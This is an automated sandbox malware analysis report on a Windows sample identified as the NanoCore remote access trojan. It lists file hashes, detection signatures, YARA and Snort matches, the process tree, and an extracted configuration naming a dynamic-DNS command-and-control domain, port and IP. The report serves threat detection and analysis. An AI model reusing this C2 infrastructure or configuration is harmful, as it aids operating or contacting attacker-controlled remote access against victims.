Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fyTwP4SHWF.exe

Overview

General Information

Sample Name:fyTwP4SHWF.exe
Analysis ID:795634
MD5:d3e933b0aab571bdc73355a106d657e0
SHA1:ee600eacf16a1075fc8a28116a64f96403122d49
SHA256:51ab5d042dee8df90162a00a3307cf8d38d12bc54b7dc07c756996aa0f6b3804
Tags:32exetrojan
Infos:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Sigma detected: NanoCore
Detected Nanocore Rat
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Yara detected Nanocore RAT
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
.NET source code contains potential unpacker
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • fyTwP4SHWF.exe (PID: 6032 cmdline: C:\Users\user\Desktop\fyTwP4SHWF.exe MD5: D3E933B0AAB571BDC73355A106D657E0)
    • rnixgfly.exe (PID: 4904 cmdline: "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt MD5: C1DC97853E14C21B463C6E95B21C300C)
      • rnixgfly.exe (PID: 3192 cmdline: C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe MD5: C1DC97853E14C21B463C6E95B21C300C)
  • jfcarlsrvb.exe (PID: 4528 cmdline: "C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exe" "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\ MD5: C1DC97853E14C21B463C6E95B21C300C)
    • WerFault.exe (PID: 4388 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 656 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • jfcarlsrvb.exe (PID: 5880 cmdline: "C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exe" "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\ MD5: C1DC97853E14C21B463C6E95B21C300C)
    • WerFault.exe (PID: 5912 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5880 -s 628 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
{"Version": "1.2.2.0", "Mutex": "7dcf7c5d-e4be-40f9-826b-505d4386", "Group": "Inflows", "Domain1": "boele.duckdns.org", "Domain2": "boele.duckdns.org", "Port": 6269, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x16e3:$x1: NanoCore.ClientPluginHost
  • 0x171c:$x2: IClientNetworkHost
00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x16e3:$x2: NanoCore.ClientPluginHost
  • 0x1800:$s4: PipeCreated
  • 0x16fd:$s5: IClientLoggingHost
00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
  • 0x175f:$x2: NanoCore.ClientPlugin
  • 0x16e3:$x3: NanoCore.ClientPluginHost
  • 0x1775:$i3: IClientNetwork
  • 0x16fd:$i6: IClientLoggingHost
  • 0x171c:$i7: IClientNetworkHost
  • 0x1491:$s1: ClientPlugin
  • 0x1768:$s1: ClientPlugin
00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmpWindows_Trojan_Nanocore_d8c4e3c5unknownunknown
  • 0x16e3:$a1: NanoCore.ClientPluginHost
  • 0x175f:$a2: NanoCore.ClientPlugin
  • 0x16fd:$b9: IClientLoggingHost
00000002.00000002.509009346.0000000006860000.00000004.08000000.00040000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x350b:$x1: NanoCore.ClientPluginHost
  • 0x3525:$x2: IClientNetworkHost
Click to see the 97 entries
SourceRuleDescriptionAuthorStrings
1.2.rnixgfly.exe.2223658.2.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.rnixgfly.exe.2223658.2.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xff05:$x1: NanoCore Client.exe
  • 0x1018d:$x2: NanoCore.ClientPluginHost
  • 0x117c6:$s1: PluginCommand
  • 0x117ba:$s2: FileCommand
  • 0x1266b:$s3: PipeExists
  • 0x18422:$s4: PipeCreated
  • 0x101b7:$s5: IClientLoggingHost
1.2.rnixgfly.exe.2223658.2.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    1.2.rnixgfly.exe.2223658.2.raw.unpackMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
    • 0xfef5:$x1: NanoCore Client
    • 0xff05:$x1: NanoCore Client
    • 0x1014d:$x2: NanoCore.ClientPlugin
    • 0x1018d:$x3: NanoCore.ClientPluginHost
    • 0x10142:$i1: IClientApp
    • 0x10163:$i2: IClientData
    • 0x1016f:$i3: IClientNetwork
    • 0x1017e:$i4: IClientAppHost
    • 0x101a7:$i5: IClientDataHost
    • 0x101b7:$i6: IClientLoggingHost
    • 0x101ca:$i7: IClientNetworkHost
    • 0x101dd:$i8: IClientUIHost
    • 0x101eb:$i9: IClientNameObjectCollection
    • 0x10207:$i10: IClientReadOnlyNameObjectCollection
    • 0xff54:$s1: ClientPlugin
    • 0x10156:$s1: ClientPlugin
    • 0x1064a:$s2: EndPoint
    • 0x10653:$s3: IPAddress
    • 0x1065d:$s4: IPEndPoint
    • 0x12093:$s6: get_ClientSettings
    • 0x12637:$s7: get_Connected
    1.2.rnixgfly.exe.2223658.2.raw.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfef5:$a: NanoCore
    • 0xff05:$a: NanoCore
    • 0x10139:$a: NanoCore
    • 0x1014d:$a: NanoCore
    • 0x1018d:$a: NanoCore
    • 0xff54:$b: ClientPlugin
    • 0x10156:$b: ClientPlugin
    • 0x10196:$b: ClientPlugin
    • 0x1007b:$c: ProjectData
    • 0x10a82:$d: DESCrypto
    • 0x1844e:$e: KeepAlive
    • 0x1643c:$g: LogClientMessage
    • 0x12637:$i: get_Connected
    • 0x10db8:$j: #=q
    • 0x10de8:$j: #=q
    • 0x10e04:$j: #=q
    • 0x10e34:$j: #=q
    • 0x10e50:$j: #=q
    • 0x10e6c:$j: #=q
    • 0x10e9c:$j: #=q
    • 0x10eb8:$j: #=q
    Click to see the 294 entries

    AV Detection

    barindex
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\rnixgfly.exe, ProcessId: 3192, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

    E-Banking Fraud

    barindex
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\rnixgfly.exe, ProcessId: 3192, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

    Stealing of Sensitive Information

    barindex
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\rnixgfly.exe, ProcessId: 3192, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

    Remote Access Functionality

    barindex
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\rnixgfly.exe, ProcessId: 3192, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
    Timestamp:192.168.2.745.137.65.1324973462692816766 02/01/23-05:15:28.676401
    SID:2816766
    Source Port:49734
    Destination Port:6269
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:45.137.65.132192.168.2.76269497272841753 02/01/23-05:14:56.574585
    SID:2841753
    Source Port:6269
    Destination Port:49727
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:45.137.65.132192.168.2.76269497442841753 02/01/23-05:16:22.394490
    SID:2841753
    Source Port:6269
    Destination Port:49744
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.745.137.65.1324972862692816766 02/01/23-05:15:03.576741
    SID:2816766
    Source Port:49728
    Destination Port:6269
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.745.137.65.1324971162692816766 02/01/23-05:14:19.296579
    SID:2816766
    Source Port:49711
    Destination Port:6269
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:45.137.65.132192.168.2.76269497402810451 02/01/23-05:15:57.113635
    SID:2810451
    Source Port:6269
    Destination Port:49740
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:45.137.65.132192.168.2.76269497222841753 02/01/23-05:14:40.350682
    SID:2841753
    Source Port:6269
    Destination Port:49722
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.745.137.65.1324972062692816766 02/01/23-05:14:35.257700
    SID:2816766
    Source Port:49720
    Destination Port:6269
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:45.137.65.132192.168.2.76269497402841753 02/01/23-05:15:57.113635
    SID:2841753
    Source Port:6269
    Destination Port:49740
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.745.137.65.1324973062692816766 02/01/23-05:15:09.580115
    SID:2816766
    Source Port:49730
    Destination Port:6269
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.745.137.65.1324973362692816766 02/01/23-05:15:22.661130
    SID:2816766
    Source Port:49733
    Destination Port:6269
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:45.137.65.132192.168.2.76269497232841753 02/01/23-05:14:46.707897
    SID:2841753
    Source Port:6269
    Destination Port:49723
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:45.137.65.132192.168.2.76269497242841753 02/01/23-05:14:51.698320
    SID:2841753
    Source Port:6269
    Destination Port:49724
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:45.137.65.132192.168.2.76269497412841753 02/01/23-05:16:02.171075
    SID:2841753
    Source Port:6269
    Destination Port:49741
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:45.137.65.132192.168.2.76269497432841753 02/01/23-05:16:07.296877
    SID:2841753
    Source Port:6269
    Destination Port:49743
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:45.137.65.132192.168.2.76269497142810290 02/01/23-05:14:28.429351
    SID:2810290
    Source Port:6269
    Destination Port:49714
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.745.137.65.1324973762692816766 02/01/23-05:15:41.799633
    SID:2816766
    Source Port:49737
    Destination Port:6269
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.745.137.65.1324974162692816766 02/01/23-05:16:02.177770
    SID:2816766
    Source Port:49741
    Destination Port:6269
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:45.137.65.132192.168.2.76269497392841753 02/01/23-05:15:52.038941
    SID:2841753
    Source Port:6269
    Destination Port:49739
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.745.137.65.1324971462692816766 02/01/23-05:14:29.178500
    SID:2816766
    Source Port:49714
    Destination Port:6269
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:45.137.65.132192.168.2.76269497312841753 02/01/23-05:15:14.788888
    SID:2841753
    Source Port:6269
    Destination Port:49731
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:45.137.65.132192.168.2.76269497352841753 02/01/23-05:15:33.801145
    SID:2841753
    Source Port:6269
    Destination Port:49735
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:45.137.65.132192.168.2.76269497382841753 02/01/23-05:15:46.943033
    SID:2841753
    Source Port:6269
    Destination Port:49738
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: fyTwP4SHWF.exeReversingLabs: Detection: 51%
    Source: boele.duckdns.orgAvira URL Cloud: Label: malware
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2223658.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.417058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.5e41a8.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.58c0000.24.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.4f60000.20.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.35eb3f8.18.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.2490000.3.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.2490000.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.58c4629.23.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.400000.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.5e41a8.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.417058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.58c0000.24.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2223658.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2210000.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.35efa21.15.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 2.2.rnixgfly.exe.35eb3f8.18.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.rnixgfly.exe.2210000.3.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000002.00000002.503941570.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.506631236.0000000004F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.501682752.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rnixgfly.exe PID: 4904, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: rnixgfly.exe PID: 3192, type: MEMORYSTR
    Source: 2.2.rnixgfly.exe.4f60000.20.unpackAvira: Label: TR/Dropper.MSIL.Gen7
    Source: 2.2.rnixgfly.exe.58c0000.24.unpackAvira: Label: TR/NanoCore.fadte
    Source: 2.2.rnixgfly.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
    Source: 00000002.00000002.503941570.00000000035E1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "7dcf7c5d-e4be-40f9-826b-505d4386", "Group": "Inflows", "Domain1": "boele.duckdns.org", "Domain2": "boele.duckdns.org", "Port": 6269, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

    Compliance

    barindex
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeUnpacked PE file: 2.2.rnixgfly.exe.400000.0.unpack
    Source: fyTwP4SHWF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: fyTwP4SHWF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\xampp\htdocs\33e7f28c8a384f9f8b302c3296aa65f3\Loader\Release\Loader.pdb source: fyTwP4SHWF.exe, 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmp, fyTwP4SHWF.exe, 00000000.00000002.253928121.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, rnixgfly.exe, 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmp, rnixgfly.exe, 00000001.00000000.238095500.0000000000410000.00000002.00000001.01000000.00000004.sdmp, rnixgfly.exe, 00000001.00000002.249127732.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000000.241176736.0000000000410000.00000002.00000001.01000000.00000004.sdmp, jfcarlsrvb.exe, 00000003.00000000.263703870.0000000000410000.00000002.00000001.01000000.00000007.sdmp, jfcarlsrvb.exe, 00000003.00000002.287251296.0000000000410000.00000002.00000001.01000000.00000007.sdmp, jfcarlsrvb.exe, 00000007.00000000.283385177.0000000000410000.00000002.00000001.01000000.00000007.sdmp, jfcarlsrvb.exe, 00000007.00000002.292565762.0000000000410000.00000002.00000001.01000000.00000007.sdmp, jfcarlsrvb.exe.1.dr, rnixgfly.exe.0.dr, nsvBAAC.tmp.0.dr
    Source: Binary string: wntdll.pdbUGP source: rnixgfly.exe, 00000001.00000003.241263782.0000000002370000.00000004.00001000.00020000.00000000.sdmp, rnixgfly.exe, 00000001.00000003.247105696.000000001A5D0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.508782806.00000000067F0000.00000004.08000000.00040000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: rnixgfly.exe, 00000001.00000003.241263782.0000000002370000.00000004.00001000.00020000.00000000.sdmp, rnixgfly.exe, 00000001.00000003.247105696.000000001A5D0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: rnixgfly.exe, 00000002.00000002.508900878.0000000006830000.00000004.08000000.00040000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.503941570.0000000003851000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.508849965.0000000006810000.00000004.08000000.00040000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: rnixgfly.exe, 00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.503941570.0000000003851000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: rnixgfly.exe, 00000002.00000002.508822078.0000000006800000.00000004.08000000.00040000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
    Source: C:\Users\user\Desktop\fyTwP4SHWF.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
    Source: C:\Users\user\AppData\Local\Temp\rnixgfly.exeCode function: 2_2_00406715 FindFirstFileExW,2_2_00406715

    Networking

    barindex
    Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.7:49711 -> 45.137.65.132:6269
    Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.7:49714 -> 45.137.65.132:6269
    Source: TrafficSnort IDS: 2810290 ETPRO TROJAN NanoCore RAT Keepalive Response 1 45.137.65.132:6269 -> 192.168.2.7:49714
    Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.7:49720 -> 45.137.65.132:6269
    Source: TrafficSnort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 45.137.65.132:6269 -> 192.168.2.7:49722
    Source: TrafficSnort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 45.137.65.132:6269 -> 192.168.2.7:49723
    Source: TrafficSnort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 45.137.65.132:6269 -> 192.168.2.7:49724
    Source: TrafficSnort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 45.137.65.132:6269 -> 192.168.2.7:49727
    Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.7:49728 -> 45.137.65.132:6269
    Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.7:49730 -> 45.137.65.132:6269
    Source: TrafficSnort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 45.137.65.132:6269 -> 192.168.2.7:49731
    Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.7:49733 -> 45.137.65.132:6269
    Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.7:49734 -> 45.137.65.132:6269
    Source: TrafficSnort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 45.137.65.132:6269 -> 192.168.2.7:49735
    Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.7:49737 -> 45.137.65.132:6269
    Source: TrafficSnort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 45.137.65.132:6269 -> 192.168.2.7:49738
    Source: TrafficSnort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 45.137.65.132:6269 -> 192.168.2.7:49739
    Source: TrafficSnort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 45.137.65.132:6269 -> 192.168.2.7:49740
    Source: TrafficSnort IDS: 2810451 ETPRO TROJAN NanoCore RAT Keepalive Response 3 45.137.65.132:6269 -> 192.168.2.7:49740
    Source: TrafficSnort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 45.137.65.132:6269 -> 192.168.2.7:49741
    Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.7:49741 -> 45.137.65.132:6269
    Source: TrafficSnort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 45.137.65.132:6269 -> 192.168.2.7:49743
    Source: TrafficSnort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 45.137.65.132:6269 -> 192.168.2.7:49744
    Source: Malware configuration extractorURLs: boele.duckdns.org
    Source: unknownDNS query: name: boele.duckdns.org
    Source: Joe Sandbox ViewASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
    Source: global trafficTCP traffic: 192.168.2.7:49711 -> 45.137.65.132:6269
    Source: rnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.503941570.0000000003851000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com
    Source: fyTwP4SHWF.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: rnixgfly.exe, 00000002.00000002.502791120.0000000002551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: unknownDNS traffic detected: queries for: boele.duckdns.org
    Source: rnixgfly.exe, 00000002.00000002.503941570.00000000035E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevices
